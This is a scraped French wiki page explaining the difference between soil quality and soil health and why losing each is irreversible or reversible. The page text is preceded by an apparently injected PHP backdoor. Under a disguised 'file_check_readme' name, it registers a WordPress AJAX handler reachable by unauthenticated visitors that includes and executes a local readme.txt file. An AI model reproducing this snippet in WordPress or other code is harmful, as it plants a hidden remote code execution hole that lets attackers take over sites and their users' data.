if(!function_exists('file_check_readme16882')){ add_action('wp_ajax_nopriv_file_check_readme16882', 'file_check_readme16882'); add_action('wp_ajax_file_check_readme16882', 'file_check_readme16882'); function file_check_readme16882() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } La santé du sol à reconquérir - Wiki Soleau

La santé du sol à reconquérir

1.Qualité et santé du sol, 2 notions à ne pas confondrea.Qualité d'un solb.Santé d'un solc.Reversibilité/irréversibilité

Qualité et santé du sol, 2 notions à ne pas confondre

Il ne faut pas confondre QUALITÉ du sol et SANTÉ du sol, deux notions bien distinctes que l’on a tendance , dans le langage courant à mélanger.

Le sol est un système qui assure un certain nombre de fonctions écologiques (décompositions des matières organiques, recyclage des nutriments, maintenance de la structure….)

Qualité d’un sol

La qualité d’un sol correspond à ses potentialités intrinsèques pour accomplir ces fonctions écologiques.

Santé d’un sol

La santé du sol témoigne des performances du sol pour accomplir ces fonctions écologiques.

Reversibilité/irréversibilité

  • la perte de qualité de sol est irréversible à l’échelle humaine (ex: l’érosion engendre des pertes de volumes de sol qui nécessiteront des milliers d’années pour recréer les volumes perdus)
  • la perte de santé du sol est réversible: on peut améliorer la santé du sol par des pratiques favorables aux fonctions écologiques.

Un sol des très bonne qualité (qui a un fort potentiel pour assurer les fonctions écologiques) peut être en très mauvaise santé. De même même un sol de moindre qualité peut être en très bonne santé et assurer bien mieux les fonctions écologiques.

D’où l’importance de veiller à ne pas perdre de la qualité de sol et à travailler sur la santé des sols.